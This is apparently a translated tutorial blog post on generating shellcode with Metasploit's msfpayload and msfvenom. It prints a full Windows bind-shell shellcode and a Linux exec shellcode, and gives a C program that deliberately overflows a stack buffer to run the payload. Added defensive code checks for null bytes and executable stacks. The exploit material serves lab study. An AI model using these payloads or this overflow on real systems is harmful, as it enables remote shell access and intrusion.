Stack overflow attacks with Metasploit, part 2


    Now that the basic stack overflow is understood, an important problem in a real attack is generating the shellcode.

    The tools that ship with Metasploit make shellcode generation convenient, and the result can then be verified with the code from part 1.

    First, how to generate the shellcode (everything here was generated under BT5).

    The examples follow: http://www.offensive-security.com/metasploit-unleashed/Msfpayload

    List the available payloads:

    root@kali:~# msfpayload -l
    
    Framework Payloads (251 total)
    ==============================
    
        Name                                             Description
        ----                                             -----------
        aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
        aix/ppc/shell_find_port                          Spawn a shell on an established connection
        aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
        aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
        bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    
    ...snip...
    ...snip...
    
        windows/x64/shell/bind_tcp                       Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
        windows/x64/shell/reverse_tcp                    Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
        windows/x64/shell_bind_tcp                       Listen for a connection and spawn a command shell (Windows x64)
        windows/x64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell (Windows x64)
        windows/x64/vncinject/bind_tcp                   Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
        windows/x64/vncinject/reverse_tcp                Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)

    Show the options of a specific payload:

    root@kali:~# msfpayload windows/shell_bind_tcp o
    
           Name: Windows Command Shell, Bind TCP Inline
         Module: payload/windows/shell_bind_tcp
        Version: 14774
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 341
           Rank: Normal
    
    Provided by:
      vlad902 
      sf 
    
    Basic options:
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LPORT     4444             yes       The listen port
    RHOST                      no        The target address
    
    Description:
      Listen for a connection and spawn a command shell

    Finally, generate the shellcode. Using the payload above, produce shellcode in C format:

    root@bt:~# msfpayload windows/shell_bind_tcp LPORT=7777 C
    /*
     * windows/shell_bind_tcp - 341 bytes
     * http://www.metasploit.com
     * VERBOSE=false, LPORT=7777, RHOST=, EXITFUNC=process,
     * InitialAutoRunScript=, AutoRunScript=
     */
    unsigned char buf[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
    "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
    "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
    "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
    "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
    "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
    "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
    "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
    "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
    "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
    "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
    "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
    "\x31\xdb\x53\x68\x02\x00\x1e\x61\x89\xe6\x6a\x10\x56\x57\x68"
    "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
    "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
    "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
    "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
    "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
    "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
    "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
    "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
    "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

    Since we are actually working on Linux, we need Linux shellcode, so we generate it from the exec payload instead:

    root@bt:~# msfpayload  linux/x86/exec CMD=ls C
    /*
     * linux/x86/exec - 38 bytes
     * http://www.metasploit.com
     * VERBOSE=false, PrependSetresuid=false,
     * PrependSetreuid=false, PrependSetuid=false,
     * PrependChrootBreak=false, AppendExit=false, CMD=ls
     */
    unsigned char buf[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
    "\x73\x00\x57\x53\x89\xe1\xcd\x80";

    Now we can verify it in the shell.c from the previous part:

    #include <unistd.h>
    #include <string.h>   /* memcpy() */

    unsigned char large_string[128];
    /*
     * linux/x86/exec - 38 bytes
     * http://www.metasploit.com
     * VERBOSE=false, PrependSetresuid=false,
     * PrependSetreuid=false, PrependSetuid=false,
     * PrependChrootBreak=false, AppendExit=false, CMD=ls
     */
    unsigned char shellcode[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
    "\x73\x00\x57\x53\x89\xe1\xcd\x80";

    int main(void) {
        char buffer[96];
        size_t i;
        long *long_ptr = (long *) large_string;

        /* Fill large_string with the address of buffer, so that the saved
         * return address above buffer is overwritten with it. */
        for (i = 0; i < sizeof(large_string)/sizeof(long); i++)
            *(long_ptr + i) = (long) buffer;

        /* Place the shellcode at the start of large_string. */
        for (i = 0; i < sizeof(shellcode); i++)
            large_string[i] = shellcode[i];

        /* Deliberate overflow: 128 bytes copied into a 96-byte buffer. memcpy()
         * is used instead of strcpy() because the shellcode contains 0x00 bytes. */
        memcpy(buffer, large_string, sizeof(large_string));
        return 0;
    }

    Note the memcpy call at the end of main(): I replaced strcpy with memcpy because the generated shellcode contains quite a few 0x00 bytes, and strcpy would stop copying at the first one.
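As an added illustration (not code from the original post), the scan below reports which offsets of the linux/x86/exec payload hold 0x00 and how many bytes a strcpy() would actually have carried; the payload bytes are the ones msfpayload printed above, and the function names are mine.

```c
/* Added example (not from the original post): scan a payload for bad bytes and
 * show why strcpy() would truncate the linux/x86/exec payload printed above. */
#include <stdio.h>
#include <string.h>

/* The 38-byte linux/x86/exec (CMD=ls) payload from the msfpayload output above. */
static const unsigned char exec_payload[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
    "\x73\x00\x57\x53\x89\xe1\xcd\x80";
#define EXEC_PAYLOAD_LEN (sizeof(exec_payload) - 1)  /* drop the string terminator */

/* The one byte value a strcpy()-style copy can never carry. */
static const unsigned char NUL_BYTE[] = { 0x00 };

/* Bytes a strcpy()/strlen() based copy would see: it stops at the first 0x00. */
size_t strcpy_visible_len(const unsigned char *buf, size_t len) {
    size_t i = 0;
    while (i < len && buf[i] != 0) i++;
    return i;
}

/* Count bytes of buf[0..len) that occur in bad[0..nbad); when hits is non-NULL,
 * record the offsets of the first max_hits of them. */
size_t count_bad_bytes(const unsigned char *buf, size_t len,
                       const unsigned char *bad, size_t nbad,
                       size_t *hits, size_t max_hits) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        if (memchr(bad, buf[i], nbad) == NULL) continue;
        if (hits && n < max_hits) hits[n] = i;
        n++;
    }
    return n;
}

/* Offset of the first bad byte, or (size_t)-1 when the payload is clean. */
size_t first_bad_offset(const unsigned char *buf, size_t len,
                        const unsigned char *bad, size_t nbad) {
    size_t hit;
    return count_bad_bytes(buf, len, bad, nbad, &hit, 1) ? hit : (size_t)-1;
}

int main(void) {
    printf("payload: %zu bytes, strcpy() would copy only %zu; %zu null byte(s), first at %zu\n",
           EXEC_PAYLOAD_LEN, strcpy_visible_len(exec_payload, EXEC_PAYLOAD_LEN),
           count_bad_bytes(exec_payload, EXEC_PAYLOAD_LEN, NUL_BYTE, 1, NULL, 0),
           first_bad_offset(exec_payload, EXEC_PAYLOAD_LEN, NUL_BYTE, 1));
    return 0;
}
```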

    Compile and run it with the same commands as before to verify:

    bai@ubuntu:/mnt/hgfs/r/stack$ gcc -fno-stack-protector -z execstack -g -o shell shell.c
    bai@ubuntu:/mnt/hgfs/r/stack$ ./shell
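The `-z execstack` flag records an executable stack in the binary's PT_GNU_STACK program header, which is what lets bytes copied into buffer run at all. The check below is an added example, not part of the original post: it reads that header from an ELF32 or ELF64 image so a build or review step can flag binaries built this way; it assumes the Linux <elf.h> definitions and is exercised against a constructed minimal image rather than the shell binary.

```c
/* Added example (not from the original post): does an ELF image request an
 * executable stack, i.e. what gcc -z execstack records in PT_GNU_STACK? */
#include <elf.h>
#include <stdio.h>
#include <string.h>

/* 1 = PT_GNU_STACK present with PF_X (executable stack), 0 = present without it,
 * -1 = not a parsable ELF32/ELF64 image or no PT_GNU_STACK header at all (the
 * kernel then applies an architecture default, so -1 deserves a look too). */
int elf_stack_executable(const unsigned char *img, size_t len) {
    if (len < EI_NIDENT || memcmp(img, ELFMAG, SELFMAG) != 0) return -1;
    int is64 = img[EI_CLASS] == ELFCLASS64;
    if (!is64 && img[EI_CLASS] != ELFCLASS32) return -1;
    size_t phoff, phentsize, phnum, phsz = is64 ? sizeof(Elf64_Phdr) : sizeof(Elf32_Phdr);
    if (is64) {
        Elf64_Ehdr eh; if (len < sizeof eh) return -1; memcpy(&eh, img, sizeof eh);
        phoff = eh.e_phoff; phentsize = eh.e_phentsize; phnum = eh.e_phnum;
    } else {
        Elf32_Ehdr eh; if (len < sizeof eh) return -1; memcpy(&eh, img, sizeof eh);
        phoff = eh.e_phoff; phentsize = eh.e_phentsize; phnum = eh.e_phnum;
    }
    if (phentsize < phsz) return -1;
    for (size_t i = 0; i < phnum; i++) {
        size_t off = phoff + i * phentsize;
        Elf64_Word type, flags;                 /* 32-bit fields in both ELF classes */
        if (off < phoff || off + phsz > len) return -1;   /* wrapped or truncated */
        if (is64) { Elf64_Phdr ph; memcpy(&ph, img + off, sizeof ph); type = ph.p_type; flags = ph.p_flags; }
        else      { Elf32_Phdr ph; memcpy(&ph, img + off, sizeof ph); type = ph.p_type; flags = ph.p_flags; }
        if (type == PT_GNU_STACK) return (flags & PF_X) ? 1 : 0;
    }
    return -1;
}

/* Constructed sample: a minimal ELF64 image holding one PT_GNU_STACK header. */
size_t build_sample(unsigned char *out, size_t cap, int executable) {
    Elf64_Ehdr eh; Elf64_Phdr ph; memset(&eh, 0, sizeof eh); memset(&ph, 0, sizeof ph);
    if (cap < sizeof eh + sizeof ph) return 0;
    memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_phoff = sizeof eh; eh.e_phentsize = sizeof ph; eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK; ph.p_flags = PF_R | PF_W | (executable ? PF_X : 0);
    memcpy(out, &eh, sizeof eh); memcpy(out + sizeof eh, &ph, sizeof ph);
    return sizeof eh + sizeof ph;
}
/* Build the sample with or without PF_X and classify it. */
int sample_stack_executable(int executable) {
    unsigned char img[sizeof(Elf64_Ehdr) + sizeof(Elf64_Phdr)];
    return elf_stack_executable(img, build_sample(img, sizeof img, executable));
}
int main(void) {
    printf("execstack-style image: %d, non-executable stack image: %d\n",
           sample_stack_executable(1), sample_stack_executable(0));
    return 0;
}
```

On a real file, read the whole binary into memory and pass it to elf_stack_executable(); `readelf -lW shell | grep GNU_STACK` shows the same flags by hand.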

    To avoid 0x00 bytes in the shellcode, msfvenom can apply an encoder; again using the example above:

    root@bt:~# msfvenom  -p linux/x86/exec CMD=ls -e x86/shikata_ga_nai -b '\x00' -f c
    [*] x86/shikata_ga_nai succeeded with size 65 (iteration=1)
    unsigned char buf[] =
    "\xdb\xd6\xd9\x74\x24\xf4\xbb\xe3\xa4\x6b\x7e\x58\x2b\xc9\xb1"
    "\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d"
    "\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3"
    "\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d"
    "\x46\x05\x66\x1c\xe8";

    There is a problem, however: the shellcode generated this way cannot be used. It raises an illegal instruction and produces a core dump, for a reason I have not determined.

Original post: https://www.cnblogs.com/baizx/p/4114770.html